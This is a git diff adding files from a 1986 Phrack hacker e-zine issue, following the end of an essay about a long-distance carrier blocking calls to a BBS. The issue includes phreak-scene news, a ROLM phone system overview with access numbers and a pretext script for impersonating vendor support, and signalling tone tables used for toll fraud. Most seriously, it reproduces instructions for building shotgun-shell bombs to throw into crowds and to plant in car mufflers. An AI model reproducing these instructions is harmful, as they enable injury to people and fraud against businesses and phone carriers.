+long distance company that needed help investigating call fraud would not only
+receive help, but MBT would actually prepare the case and appear in court for
+prosecution!
+
+My calls to Teleconnect were simply ignored.  Letters to the public service
+commission, FCC, and other government departments were also ignored.  I did,
+however, get some cooperation from our U.S. Representative Dale Kildee, who
+filed a complaint in my name to the FCC and the Interstate Commerce Commission.
+What follows is their summary of an FCC investigation to Mr. Kildee's office.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Dear Congressman Kildee:
+
+This is in further response to your October 18, 1988 memorandum enclosing
+correspondence from Mr. Gerald R. Cross, President of the Genesee Atari Group
+in Flint, Michigan concerning a reported incidence of blocking calls from
+access to Curt Kyhl's Stock Exchange Bulletin Board System in Waterloo, Iowa by
+Teleconnect, a long distance carrier.  Mr. Cross, who also operates a bulletin
+board system (bbs), attaches information indicating that Teleconnect blocked
+callers from access via its network to Mr. Kyhl's BBS number in an effort to
+prevent unauthorized use of its customers' long distance calling authorization
+codes by computer "hackers."  Mr. Cross is concerned that this type of blocking
+may be occurring in Michigan and that such practice could easily spread
+nationwide, thereby preventing access to BBSs by legitimate computer users.
+
+On November 7, 1988, the Informal Complaints Branch of the Common Carrier
+Bureau directed Teleconnect to investigate Mr. Cross' concerns and report the
+results of its investigation to this Commission.  Enclosed, for your
+information, is a copy of Teleconnect's December 7, 1988 report and its
+response to a similar complaint filed with this Commission by Mr. James
+Schmickley.  In accordance with the commission's rules, the carrier should have
+forwarded a copy of its December 7, 1988 report to Mr. Cross at the same time
+this report was filed with the Commission.  I apologize for the delay in
+reporting the results of our investigation to your office.
+
+Teleconnect's report states that it is subject to fraudulent use of its network
+by individuals who use BBSs in order to unlawfully obtain personal
+authorization codes of consumers.  Teleconnect also states that computer
+"hackers" employ a series of calling patterns to access a carrier's network in
+order to steal long distance services.  The report further states that
+Teleconnect monitors calling patterns on a 24 hour basis in an effort to
+control, and eliminate when possible, code abuse.  As a result of this
+monitoring, Teleconnect advises that its internal security staff detected
+repeated attempts to access the BBS numbers in question using multiple
+seven-digit access codes of legitimate Teleconnect customers.  These calling
+patterns, according to Teleconnect, clearly indicated that theft of
+telecommunications services was occurring.
+
+The report states that Teleconnect makes a decision to block calls when the
+estimated loss of revenue reaches at least $500.  Teleconnect notes that
+blocking is only initiated when signs of "hacking" and other unauthorized usage
+are present, when local calls are attempted over its long distance network or
+when a customer or other carrier has requested blocking of a certain number.
+Teleconnect maintains that blocking is in compliance with the provisions of
+Section A.20.a.04 of Teleconnect's Tariff FCC No. #3 which provides that
+service may be refused or disconnected without prior notice by Teleconnect for
+fraudulent unauthorized use.  The report also states that Teleconnect customers
+whose authorizations codes have been fraudulently used are immediately notified
+of such unauthorized use and are issued new access codes.  Teleconnect further
+states that while an investigation is pending, customers are given instructions
+on how to utilize an alternative carrier's network by using "10XXX" carrier
+codes to access interstate or intrastate communications until blocking can be
+safely lifted.
+
+Teleconnect maintains that although its tariff does not require prior notice to
+the number targeted to be blocked, it does, in the case of a BBS, attempt to
+identify and contact the Systems Operator (SysOp), since the SysOp will often
+be able to assist in the apprehension of an unauthorized user.  The report
+states that with regard to Mr. Kyle's Iowa BBS, Teleconnect was unable to
+identify Mr. Kyle as the owner of the targeted number because the number was
+unlisted and Mr. Kyhl's local carrier was not authorized to and did not release
+any information to Teleconnect by which identification could be made.  The
+report also states that Teleconnect attempted to directly access the BBS to
+determine the identity of the owner but was unable to do so because its
+software was incompatible with the BBS.
+
+Teleconnect states that its actions are not discriminatory to BBSs and states
+that it currently provides access to literally hundreds of BBSs around the
+country.  The report also states that Teleconnect's policy to block when
+unauthorized use is detected is employed whether or not such use involves a
+BBS.  Teleconnect advises that when an investigation is concluded or when a
+complaint is received concerning the blocking, the blocking will be lifted, as
+in the case of the Iowa BBS.  However, Teleconnect notes that blocking will be
+reinstated if illegal "hacking" recurs.
+
+Teleconnect advises that it currently has no ongoing investigations within the
+State of Michigan and therefore, is not presently blocking any BBSs in
+Michigan.  However, Teleconnect states that it is honoring the request of other
+carriers and customers to block access to certain numbers.
+
+The Branch has reviewed the file on this case.  In accordance with the
+Commission's rules for informal complaints it appears that the carrier's report
+is responsive to our Notice.  Therefore, the Branch, on its own motion, is not
+prepared to recommend that the Commission take further action regarding this
+matter.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+This letter leaves me with a ton of questions.  First, let's be fair to
+Teleconnect.  Long distance carriers are being robbed of hundreds of thousands
+of dollars annually by "hackers" and must do something to prevent it.  However,
+call blocking is NOT going to stop it.  The "hacker" still has access to the
+carrier network and will simply start calling other numbers until that number,
+too, is blocked, then go on to the next.  The answer is to identify the
+"hacker" and put him out of business.  Teleconnect is taking a cheap, quick fix
+approach that does nothing to solve the problem, and hurts the phone users as a
+whole.
+
+They claim that their customers are able to use other networks to complete
+their calls if the number is being blocked.  What if other networks decide to
+use Teleconnect's approach?  You would be forced to not only keep an index of
+those numbers you call, but also the long distance carrier that will let you
+call it!  Maybe everyone will block that number, then what will you do?  What
+if AT&T decided to block calls?  Do they have this right too?
+
+And how do you find out if the number is being blocked?  In the case of Mr.
+Kyhl's BBS, callers were given a recording that stated the number was not in
+service.  It made NO mention that the call was blocked, and the caller would
+assume the service was disconnect.  While trying to investigate why his calls
+were not going through, Mr. James Schmickley placed several calls to
+Teleconnect before they finally admitted the calls were being blocked!  Only
+after repeated calls to Teleconnect was the blocking lifted.  It should also be
+noted that Mr. Kyhl's bbs is not a pirate bbs, and has been listed in a major
+computer magazine as one of the best bbs's in the country.
+
+As mentioned before, MBT will work with the long distance carriers to find
+these "hackers."  I assume that the other local carriers would do the same.  I
+do not understand why Teleconnect could not get help in obtaining Mr. Kyhl's
+address.  It is true the phone company will not give out this information, but
+WILL contact the customer to inform him that someone needs to contact him about
+possible fraud involving his phone line.  If this policy is not being used,
+maybe the FCC should look into it.
+
+Call blocking is not restricted to BBSs, according to Teleconnect.  They will
+block any number that reaches a $500 fraud loss.  Let's say you ran a computer
+mail order business and didn't want to invest in a WATS line.  Why should an
+honest businessman be penalized because someone else is breaking the law?  It
+could cost him far more the $500 from loss of sales because of Teleconnect's
+blocking policy.
+
+Teleconnect also claims that "they are honoring the request of other carriers
+and customers to block access to certain numbers."  Again, MBT also has these
+rules.  But they pertain to blocking numbers to "certain numbers" such as
+dial-a-porn services, and many 900-numbers.  What customer would ever request
+that Teleconnect block incoming calls to his phone?
+
+And it is an insult to my intelligence for Teleconnect to claim they could not
+log on to Mr. Kyhl's BBS.  Do they mean to say that with hundreds of thousands
+of dollars in computer equipment, well trained technicians, and easy access to
+phone lines, that they can't log on to a simple IBM bbs?  Meanwhile, here I sit
+with a $50 Atari 800xl and $30 Atari modem and I have no problem at all
+accessing Mr. Kyhl's bbs!  What's worse, the FCC (the agency in charge of
+regulating data transmission equipment), bought this line too!  Incredible!!!
+
+And finally, I must admit I don't have the faintest idea what Section A.20.a.04
+of Teleconnect's Tariff FCC No. 3 states, walk into your local library and ask
+for this information and you get a blank look from the librarian.  I know, I
+tried!  However, MBT also has similar rules in their tariffs.  Teleconnect
+claims that the FCC tariff claims that "service may be refused or disconnected
+without prior notice by Teleconnect for fraudulent, unauthorized use".  This
+rule, as applied to MBT, pertains ONLY to the subscriber.  If an MBT customer
+were caught illegally using their phone system then MBT has the right to
+disconnect their service.  If a Teleconnect user wishes to call a blocked
+number, and does so legally, how can Teleconnect refuse use to give them
+service?  This appears to violate the very same tarriff they claim gives them
+the right to block calls!
+
+I have a few simple answers to these questions.  I plan, once again, to send
+out letters to the appropriate agencies and government representatives, but I
+doubt they will go anywhere without a mass letter writing campaign from all of
+you.  First, order that long distance companies may not block calls without the
+consent of the customer being blocked.  Every chance should be given to him to
+assist in identifying the "hacker," and he should not be penalized for other
+people's crimes.  There should also be an agency designated to handle appeals
+if call blocking is set up on their line.  Currently, there is no agency,
+public service commission, or government office (except the FCC) that you can
+complain to, and from my experience trying to get information on call blocking
+I seriously doubt that they will assist the customer.
+
+Next, order the local phone carriers to fully assist and give information to
+the long distance companies that will help identify illegal users of their
+systems.  Finally, order the Secret Service to investigate illegal use of long
+distance access codes in the same manner that they investigate credit card
+theft.  These two crimes go hand in hand.  Stiff fines and penalties should be
+made mandatory for those caught stealing long distance services.
+
+If you would like further information, or just want to discuss this, I am
+available on Genie (G.Cross) and CompuServe (75046,267).  Also, you can reach
+me on my bbs (FACTS, 313-736-4544).  Only with your help can we put a stop to
+call blocking before it gets too far out of hand.
+
+                        >--------=====END=====--------<
diff --git a/phrack3/1.txt b/phrack3/1.txt
new file mode 100644
index 0000000..2ff77d6
--- /dev/null
+++ b/phrack3/1.txt
@@ -0,0 +1,44 @@
+                                ==Phrack Inc.==
+                    Volume One, Issue Three, Phile 1 of 10
+
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+%                                                                             %
+%                             _  _       _______                              %
+%                            | \/ |     / _____/                              %
+%                            |_||_|etal/ /hop                                 %
+%                            _________/ /                                     %
+%                           /__________/                                      %
+%                                                                             %
+%                              Proudly Presents                               %
+%                                                                             %
+%                           Phrack Inc. Issue Three                           %
+%                                                                             %
+%                            Released Feb 1, 1986                             %
+%                                                                             %
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+    The files contained in this issue of Phrack Inc. are as follows:
+
+         1: Index written by Cheap Shades
+         2: Rolm systems written by Monty Python
+         3: Making shell bombs written by Man-Tooth
+         4: Signalling systems around the world by Data Line
+         5: Private audience written by Overlord
+         6: Fortell systems written by Phantom Phreaker
+         7: Eavesdropping written by Circle Lord
+         8: Building a Shock Rod written by Circle Lord
+         9: Introduction to PBX's written by Knight Lightning
+        10: Phreak World News II written by Knight Lightning
+
+    If you have an original file that you would like published in a future
+issue of Phrack Inc. Leave E-Mail to Taran King, Knight Lightning, or Myself on
+any system that we are on.  If you cannot find us try and contact some member
+of Metal Shop to get into touch with us.
+
+                                           Later,
+                                              ________________
+                                              \Cheap/ \Shades/
+                                               \___/   \____/
+
+
+
diff --git a/phrack3/10.txt b/phrack3/10.txt
new file mode 100644
index 0000000..90965ea
--- /dev/null
+++ b/phrack3/10.txt
@@ -0,0 +1,241 @@
+                                ==Phrack Inc.==
+                   Volume One, Issue Three, Phile 10 of 10
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+                             Phreak World News II
+                                  Compiled by
+                      \\\\\=-{ Knight Lightning }-=/////
+_______________________________________________________________________________
+
+Retraction
+----------
+We at Phrack Inc, respectfully retract all statements made in last issue
+concerning Stronghold East Elite and the LOD.  We are sorry for any
+inconvenience this may have caused you.
+_______________________________________________________________________________
+
+Phreaks Against Geeks
+---------------------
+This group was formed as a joke by The W(hack)o Cracko Brothers Inc. on a
+conference in December of 1985.  The charter members were TWCB, taRfruS, Blue
+Adept, The Clashmaster, and a few others.  Since then, Catcher in the Rye and
+the Slovak have tried to join.
+
+Later that month, Boston Strangler and Micro Man formed PAP, which stands for
+Phreaks Against Phreaks Against Geeks.  Other opposers of PAG include:
+Hack Attack, The Detective, Kleptic Wizard and The Overlord 313. It is not
+known if these others are now in PAP or not.
+
+All of this nonsense was really started on the Dartmouth System and is mainly
+a local feud of phreaks in the Boston (617 NPA) area.
+_______________________________________________________________________________
+
+Brainstorm Gets 10 Megs
+-----------------------
+Finally, after several months of promises, Brainstorm (ELITE) now has a 10 Meg
+Hard-drive.  As of January 1, 1986 Modern Mutant cleared the userlog of
+Brainstorm and a membership drive was started.  Note: To become a member of
+Brainstorm, you will have to take a small (and more or less easy) filter.
+Some other new features on Brainstorm are online games; Karate, Football, and a
+hacking simulation.
+_______________________________________________________________________________
+
+Anarchy Inc. Disbanded
+----------------------
+Anarchy Inc., a once very famous g-phile writing organization, has been
+disbanded.  Basically because most of its membership are now attending college.
+_______________________________________________________________________________
+
+Dartmouth Conferences To Be Abolished?
+--------------------------------------
+This message was given on January 9, 1986 when a user would try to join a
+conference.
+
+XCaliber, Fantasie, Spectre, etc are not available until tomorrow. Due to
+pressure from Kiewit and some users, conferences have been disabled for one
+day. Hopefully this will remind some people that the conferences are a public
+service on the part of a few people and are not a "right". Recent abuse of the
+conferences has made caring for these conferences almost more trouble than they
+are worth. These abuses have also caused some users to complain to Kiewit. Too
+many complaints and they might vanish altogether. If everyone will work at
+keeping the conferences reasonably clean and free of abuse life will be much
+easier. Thank you for your time and appologies for the lack of conferences.
+
+You are no longer connected to conference "XYZ".
+
+Later, Corwin got pissed off by the password abuse that was going on and killed
+almost all non-Dartmouth student passwords.  It is also rumored that he took
+down the DUNE bbs, however Apollo Phoebus says that it is a temporary thing and
+that DUNE will be going back up soon.
+_______________________________________________________________________________
+
+MCI Employee Bust
+-----------------
+Employees at MCI were creating fake accounts and then running up massive bills.
+Then later they would either credit the accounts or say that the subscriber
+reported code abuse.  Any employee found doing this was fired.
+
+Another way these employees were cheating the company was by reporting code
+abuse on their own accounts, however MCI Security using CNA quickly caught
+these employees.
+
+Note: MCI Security has stated that the only real way that they can catch
+      abusers of the phone company is by calling the numbers that the abusers
+      call and asking them who they know making these calls.
+
+              Information has been provided through MCI Security
+_______________________________________________________________________________
+
+MCI/IBM Merge
+-------------
+MCI Telecommunications company has merged with IBM and their phone industry
+SBS.  This was an effort to join the two as strong allies against AT&T.
+
+                      IBM computers  Vs.  AT&T computers
+
+             MCI Telecommunications  Vs.  AT&T Telecommunications
+
+Changes arising from this merger (if any) are not known, but none are expected
+for some years.
+_______________________________________________________________________________
+
+The Life And Crimes of the W(hack)o Cracko Brothers
+---------------------------------------------------
+The date is somewhere in December of 1984.  Peter writes a code hacker for the
+Hayes and tells Tim NOT to use it on Sprint because they trace. Sometime later
+that night Tim received a call from Scan Man, sysop of P-80.
+
+Scan Man said he needed TWCB to hack him some Sprint codes cause he didn't have
+the time or a Hayes.  Tim did it for him on the 314-342-8900 Sprint extender.
+
+He left it on all night and the next day while he was in school.  Sprint traced
+him.  At 9:00 AM the next morning agents from the FBI, AT&T, Western Union,
+GTE, and Southwestern Bell, arrived at TWCB's house.
+
+They were let in, bringing with them cameras and tape recorders among other
+equipment.  Upon seeing this Peter blew into an upstairs extension and
+cancelled the dialing program, but not before the agents made sure it was the
+right place.
+
+All of TWCB's computer equipment was confiscated and Tim was taken downtown
+shortly after being picked up at school.  Peter was sick and left home.  Tim
+was later released in his mother's custody.
+
+They each received probation and 100 hours of county service.
+
+That was then...
+
+Recently TWCB has come under investigation for the following: Drug use and
+dealing, burglary, forgery, and fraudulent use of a credit card.
+
+Peter: 8 Class A Felony charges
+       1 Class A Misdemeanor charge
+       1 Class B Misdemeanor charge
+
+Tim:   6 Class A Felony charges
+       2 Class B Misdemeanor charges
+
+Note: Some of these misdemeanors are for not returning library books.
+
+Also it has been said that Tim has been in jail 11 times. Both members of TWCB
+are now enrolled in a reform school.
+
+The information in this article has been provided by TWCB, directly and/or
+indirectly.
+_______________________________________________________________________________
+
+Blue Adept: Gone For Good
+-------------------------
+Blue Adept, known for being an all around loser and Dartmouth impersonator,
+decided to try blue boxing.  For some reason he decided to call an out-of-state
+trunk direct.
+
+Later that month Blue Adept and his parents received a phone bill with a
+charge around $386.00.  This led to his being restricted from using the phone.
+
+Sometime after this incident Blue Adept received an invitation to join on a
+conference.  He wasn't home but his parents decided to stay on and listen in.
+
+Blue Adept is not allowed on conferences anymore and all calls to him are now
+screened.
+_______________________________________________________________________________
+
+Overlord 313 Busted: Step dad turns him in
+------------------------------------------
+Overlord's step-dad always would be checking his computer to see what was on it
+and what was nearby.  Last week he noticed the credits in Overlord's file on
+Wiretapping, which can be seen in this issue of Phrack.
+
+He reported his findings to Overlord's mom.  She had a talk with him and he
+promised to stop his evil ways.  His step-dad didn't believe him for a second.
+
+                                    1/11/86
+
+Step-dad goes on business trip, where he meets Ma Bell executive Don Mitchell.
+Step-dad asks all sorts of different questions regarding use of MCI dialups and
+Alliance Teleconferencing, and talks about how his step-son does all these
+things and more.  Don strongly suggests that he reports this to the phone
+company...
+
+                                    1-13-86
+
+                                    HE DOES
+                                    -------
+          No legal action against Overlord has taken place as of now.
+
+                  Information Provided by The Overlord of 313
+_______________________________________________________________________________
+
+Maelstrom 305 Busted
+--------------------
+While I am not at liberty to revel all the information concerning this bust I
+will mention the bare facts.
+
+Maelstrom hacked into the Southern Bell Data Network (SBDN).  This system
+happened to be local to him so he did not bother to use an extender.
+Unfortunately this system also had ANI (Automatic Number Identification).  His
+computer and other equipment as well as all his files were confiscated as
+evidence.
+
+                 Information provided by the Maelstrom of 305
+_______________________________________________________________________________
+
+Whackoland BBS
+--------------
+This bbs is now up and running strong.  Its sysops are of course...TWCB Inc.
+300/1200 Baud, and 40 Megs.  It has unique features and great mods as well as
+Elite Sections.  Call today...  314-256-8220.   Note: Only 100 users will be
+kept so if you are just a beginner please don't bother to call.
+_______________________________________________________________________________
+
+R.I.P. Broadway Show
+--------------------
+The Broadway Show BBS in New York is now down, and Broadway Hacker will soon be
+in Washington DC.  This C-64 run bbs, was one of the best in its time, but
+later it became a hangout for rodents.
+
+>From its ashes rises a new bbs, however its name has not been released as of
+this writing.  Broadway Hacker will sysop this bbs for about a week and then
+turn it over to the new sysop.  His name is not yet know, probably since he
+hasn't a handle yet.
+
+Although this new bbs will appear legal and have some legal sections it is
+indeed a phreak bbs, and should be checked out.
+
+                                 718-615-0580
+_______________________________________________________________________________
+
+Speed Demon Elite Down?
+-----------------------
+This bbs sysoped by Radical Rocker has suddenly disappeared leaving the caller
+with a message of the line being disconnected.  No other information is
+available.
+_______________________________________________________________________________
+
+Well that's all for this issue's Phreak World News. If you have anything of news
+
+                   Knight Lightning/Taran King/Cheap Shades
+_______________________________________________________________________________
+
+
diff --git a/phrack3/2.txt b/phrack3/2.txt
new file mode 100644
index 0000000..d379b15
--- /dev/null
+++ b/phrack3/2.txt
@@ -0,0 +1,195 @@
+                                ==Phrack Inc.==
+                    Volume One, Issue Three, Phile 2 of 10
+
+    The purpose of this file is to tell you what you would be dealing with if
+you stumble across this system, or if you know of a company that is using this
+system. It doesn't go into incredible detail, and is lacking in areas. It is
+not a guide to hacking into it, just letting you know what you would be dealing
+with. This is to pique your interest in the system.
+
+   So What the Hell is ROLM?
+   -------------------------
+    ROLM is a "Business Communications System" bought by IBM a few months ago,
+in an effort to compete effectively with AT&T, and get a larger share of the
+market, in a grand master plan to become "Big Daddy Blue" as opposed to "Ma
+Bell". It is a very complex system, with features such as PhoneMail, A
+Super-PBX, Local Area Networks, Public and Private Data Networks, Desktop
+Communications, and Call Management.
+    The heart of the system is the Controller, called the CBX <Computerized
+Business Exchange>. This controls the entire network accessible through ROLM.
+Since 1983, the CBX was redesigned and upgraded to the CBX II. It is a PBX with
+much much more <See 'Introduction to PBX's' available on your local bbs> to
+offer, and that is ROLM's claim to fame. It is light years ahead of the regular
+PBX system.
+
+
+    The CBX II
+    ----------
+
+    The CBX II is the core of the ROLM network. It is computer driven and
+expandable from one node, with 165 channels, to 15 nodes providing 11,5200
+2-way channels. The smaller business could have a model with a 16 user maximum
+limit, but it can go up to 10,000 users, though this would be quite rare <and
+quite God Damn expensive!>. It can be accessed from outside lines <like you> as
+well as HardWired units, with a switching system to prevent busy signals on a
+port. Speed depends on the system in place, either the newer, faster ROLMbus
+295, or the older standard ROLMbus 74. <see Service manuals for exact details>
+The larger the system, the faster as well. It is adjustable to accept different
+bandwidths for the various components, such as Telex, Voice, Data, Mainframe,
+LAN, Video <ta-da! Picturefones in reality!>, and anything hooked up to the
+system. Similar tasks can be bunched onto one channel as well, at high or low
+speeds. If multiplexing is used <above>, the maximum speed is 192,000 bps, and
+if using a single interface, the top possible rate is a mindboggling 37,000,000
+bps, which if you ask me, if just fluff and not too practical, so they are
+usually multiplexed. <Now, what a difference that is from 300 baud!>.  Using
+the CBX II network, you might find just about any kind of mainframe, from HP,
+to DEC, to VAX, to the IBM 327 series.
+   Note : There is a smaller version of this called the VSCBX.
+
+
+    Phone Mail
+    ----------
+
+     This is one of the little beauties of the system, something truly fun to
+fuck with. I called ROLM Headquarters in California to ask specific questions
+about ROLM, posing as a researcher, and I got the big runaround, transferred
+from department to department. Maybe you can get further than I. Their  is
+408-986-1000. The  to PhoneMail from the outside is 800-345-7355. A nice
+computer-generated voice comes on asking you to enter your Extension number
+<which each employee has>, and then enter the "" sign. Then enter your
+password. If you make around 3 or 4 bad attempts at an Extension of Password,
+it will automatically ring another number, assistance I assume, to find out why
+there has been an unsuccessful entry attempt. I haven't played around with this
+that much, so leave mail to Monty Python with whatever you find. Once entering
+an authorization  with correct password, you will be presented with more
+options, leave messages to other people, and whatnot. You can hear your
+messages, forward them to another person, leave the same message to more than
+one person, change your welcome message, etcetera. The service is for those
+business-type pigs who never sit still for one minute, like they are
+permanently on speed.
+
+     A Phone Mail Scenario
+     ---------------------
+
+     Let's say if Mr. Greed goes out to meet his secretary at a motel, but
+definitely has to get that important message from Mr. Rasta, who's bringing in
+$3 mil in Flake, and can't trust it to the person who would handle it <ie: the
+person filling in for his sec with the tremendous tits who is getting balled by
+the dirty old fat man>. Mr. Greed would have given Mr. Rasta his phone  and he
+would be forwarded to the Phone Mail network, where he would hear a message
+left my Mr. Greed, to anyone who would call. Mr. Rasta would leave his message
+and hang up. Then Mr. Greed could call up the 800-345-7355 , punch in his
+extension authorization number, and password. Or, if he was back at the office,
+he could get it there through DeskTop communications. Messages can be delivered
+without error, in the person's own voice, without other people knowing about
+it. Therefore, someone with enough knowledge could use an unused account and
+use it as his own service, without the knowledge of others.
+
+    DeskTop communications
+    ----------------------
+
+     ROLM has developed a Computer/Telephone integrated device for use with the
+Desktop communications. It is linked with the CBX II through fone lines, thus
+accessible by you and me from the outside. It is not hardwired, though it can
+approach hardwired speed. If you could get your hands on one of these
+computer/fones then I think you would have found something very useful at home,
+in your general life. But you could access the network without the special
+features of the fone, like one touch dialing, which is designed for the stupid
+lazy businessman. You can access company databases through the network,
+mainframes, other people, just about anything as if you were right there and
+told your secretary to do it for you. There is special software used by the
+computers or computer/fone but it can be improvised and is just an aid. It uses
+a special protocol <Don't know what, try to get your hands on one by trashing a
+sales office>. What is great is that everything is tied together through
+telefone lines, and not RS-232C! Thus, there is an access port....somewhere.
+Scan the 's around the office  using ROLM. How do you know if it is using
+ROLM one way or the other. Compile a list of local businesses, call them up
+saying "This is ROLM Customer Support. We have a report of a complaint in your
+CBX II network, let me speak to your supervisor please." If they say "ROLM? CBX
+II? We don't use that" then just apologize and go elsewhere. Or say that you
+are from ROLM corp and would like to know if the company is interested in using
+it to network its system. Like, if they have it already, they would say that
+they had it. And if they didn't, you would just give them a fake  <or if
+you're nice the  for the local sales office obtainable in the list below>.
+
+    But you know what's REALLY Great? They have made the network link in mind
+for the person with a Computer IQ of about 0. Commands are in plain English.
+Here is a demonstration screen as seen in their brochure:
+           CALL, DISPLAY or MODIFY
+
+           Display groups
+
+           ACCESSIBLE GROUPS:
+             [00] PAYROLL       [01] MODEM       [02] IBMHOST
+             [03] DOWJONES      [04] DECSYSTM    [05] MIS-SYSTM
+             [06] DALLAS        [07] SALES
+
+           CALL, DISPLAY OR MODIFY?
+           Call Payroll
+
+           CALLING 7717  <which would be the ID code for the PAYROLL file>
+           CALL COMPLETE
+
+           **PAYROLL SYSTEM** <or whatever they want to call it>
+            ENTER ACCOUNT CODE:
+
+    See, nothing is confusing, everything pretty self-explanatory. There may be
+more than one person wanting to do the same thing you are, so if there is, you
+would be put on a queue for the task. It seems that those with an IBM would be
+best suited for ROLM hacking, because ROLM is owned by IBM, and the PC's used
+by the network are IBM. A person with a simpler fone/Terminal couldn't access
+something like their DEC mainframe, or something like that. By calling in, you
+could not run an application, unless you had a special interface, but you could
+access the database, which any dumb terminal could do.
+    However, there are security levels. Thus one with a privileged account
+could access more things than one without it. Like Joe Schmoe in Sales couldn't
+get to Payroll . It seems that for non-IBM's to access some of the parts of the
+network, you would need an interface to become the same thing as a RolmPhone.
+    Excessive 's of bad logon attempts, which would be construed as a linking
+error would notify the network manager, And if they saw that there was no
+hardware error, eventually, they would think of if they were somewhat
+experienced, you guessed it, hackers.
+
+   The PBX
+   -------
+
+    ROLM has something called Integrated Call Management <from here on known as
+ICM>. Now, when designing ICM, they must have taken into account the abuse
+possible in plain ol' PBX's. So they put in something called Call Screening.
+This will enable the company to restrict calls to certain 's and prefixes.
+Calls to non-business 's or certain areas can be screened out <"No personal
+calls on my time, Johnson!">, with the exception of 1 specific  that you want.
+    There is a choice of having a codeless, screened PBX, or a PBX where
+accounts are assigned to each employee, and the 's they call get recorded to
+that account. There can be privileged accounts where a large volume of calls
+would go relatively un-noticed. But I don't think that large-scale abuse of
+this system would be easy or practical. Calls are routed AUTOMATICALLY through
+the service where the rates are cheaper to the location dialed, which is pretty
+fucking cool.  And, the PBX is accessible from the outside, using Direct Inward
+System Access, making it AB-useable.
+    But what about if there is Equal Access in that area? It doesn't matter,
+the CBX will automatically access the service without you having to worry about
+it <hell, this is totally unnecessary for a hack/phreak, cause we ain't paying
+for the damn call anyhow!>
+        BUT!: There is a use of Call Detail Recording, where information on all
+ingoing and outgoing calls are recorded.
+
+     Conclusion
+     ----------
+
+     Not a lot of research went into this file, but it did take a little while
+to type up, and all of the information is correct, to my knowledge. Anyone is
+free to expand on this file into a Part II. It was written to enlighten people
+about this system, and I hope this has helped a little bit.
+     Sysops: You are free to put this file up as long as NONE of the credits
+are changed! <this means the Phrack, Inc. AND Personal credits>. Please give us
+a chance.
+
+    Coming soon, to a telephone near you: The Return of The Flying Circus. Look
+for it.
+                   --Later On
+Monty Python             <01/11/86>
+
+
+
+
diff --git a/phrack3/3.txt b/phrack3/3.txt
new file mode 100644
index 0000000..8ab716b
--- /dev/null
+++ b/phrack3/3.txt
@@ -0,0 +1,63 @@
+                                ==Phrack Inc.==
+                    Volume One, Issue Three, Phile 3 of 10
+
+
+                   ////////////////////\\\\\\\\\\\\\\\\\\\\
+                   ::::                                ::::
+                   ::::      "SHOTGUN SHELL BOMBS"     ::::
+                   ::::               from             ::::
+                   ::::    The Poor Man's James Bond   ::::
+                   ::::           by Kurt Saxon        ::::
+                   ::::                                ::::
+                   :::: typed in by --] Man-Tooth [--  ::::
+                   ::::                                ::::
+                   \\\\\\\\\\\\\\\\\\\\////////////////////
+
+
+     These little goodies are affectionately known as "nut busters." They are
+simply shotgun shells enclosed in cardboard rolls with cardboard fins put on.
+On the primer end of the shell is glued a small cork with a hole drilled
+through it.  A roofing nail fits in the hole snugly enough to stay in, but
+loose enough to plunge into the primer upon impact.
+
+     Since the shell is not confined in the chamber of the gun, it will
+naturally not cause the same amount of damage.  But if it goes off between a
+fellow's legs he can look forward to becoming a soprano.
+
+     These bombs are thrown singly or by the handful into the air over milling
+crowds.  The weight of the shell and stabilization by the fins causes the nut
+buster to head straight downward.
+
+     It has tremendous effect as its presence is usually a suprise.  The threat
+of more coming is guaranteed to route any mob.
+
+     Not only does it go off on the pavement but it will also explode on
+contact with a person's head or shoulder.  At night it is impossible to trace
+its point of origin.
+
+                 -----
+                 !    \
+              /> !     \                /- Cork
+          Fins   !     !               v
+                 --------------------!\
+           ! \   !         !-----!   ! \ !
+           !  \> !------   !     !   !---!  <-- Roofing nail
+           !     !         !-----!   ! / !
+           \     --------------------!/
+            \    !     !       ^
+             \-> !     / ^      \
+                 !    /  !       \
+                 -----   !       Shell
+                         !
+                         !
+                Close fitting 3-1/2 inch Aluminum Tubing Glued on Shell.
+
+                      SHOTGUN SHELL BOMB
+
+
+     A clever use for a plain shotgun shell is as a muffler bomb.  The shell is
+simply shoved up a car's exhaust pipe with a length of stiff wire until it
+drops into the muffler.  After a few minutes on the road the shell explodes,
+totalling out the muffler and treating the driver to a sick kind of panic.
+
+
diff --git a/phrack3/4.txt b/phrack3/4.txt
new file mode 100644
index 0000000..bf9652e
--- /dev/null
+++ b/phrack3/4.txt
@@ -0,0 +1,57 @@
+                                ==Phrack Inc.==
+                    Volume One, Issue Three, Phile 4 of 10
+
+Signalling Systems Around the World
+
+
+For those of you who have the desire to make international calls, this info may
+be of interest.  Thanks to TAP and Nick Haflinger.
+
+CCITT 1.       An old international system, now deceased.  Used a 500 Hz tone
+                interrupted at 20 Hz (Ring) for 1-way line signals.
+
+CCITT 2.       Proposed "International Standard" that never caught on much.
+                Used 600 Hz interrupted by 750 Hz.  Still used in Australia,
+                New Zealand and South Africa.
+
+CCITT 3.       An early in-band system that uses 2280 for both line and
+                register (!!). Used in France, Austria, Poland and Hungary.
+
+CCITT 4        A variation of 3, but uses 2040 and 2400 for end to end Tx of
+                line and register.  Used for international Traffic in Europe,
+                but cannot be used with TASI (AKA Multiplex or "that dammed
+                clipping").
+
+CCITT 5        This is the most popular, and the one used in the US. 2400 and
+                the infamous 2600 are used for link to link (not merely end to
+                end line signals.  Registers are handled via DTMF (Touchtones).
+                Anyone know what 2400 does??
+
+CCITT 5 bis.   Just like above, but a 1850 Hz tone is used for TASI locking
+                and transmission of line signals.
+
+CCITT 6        The newest and worst for phreaks.  It uses digital data sent
+                out-of-band to control the connection.  In other words, the
+                connection is made and billing started BEFORE you can get
+                control.
+
+CCITT 5R1      A regional system like 5, but doesn't use the mysterious 2400
+                and can't use the multiplexer.
+
+CCITT 5R2      Probably the interface to AUTOVON, as it uses 120 Hz spaced
+                tones for DTMF instead of 200.  Also 3825 Hz is the blow-off
+                tone instead of 2600.
+
+
+The "Extra" tones
+
+1700 + 700 = Inward Operator
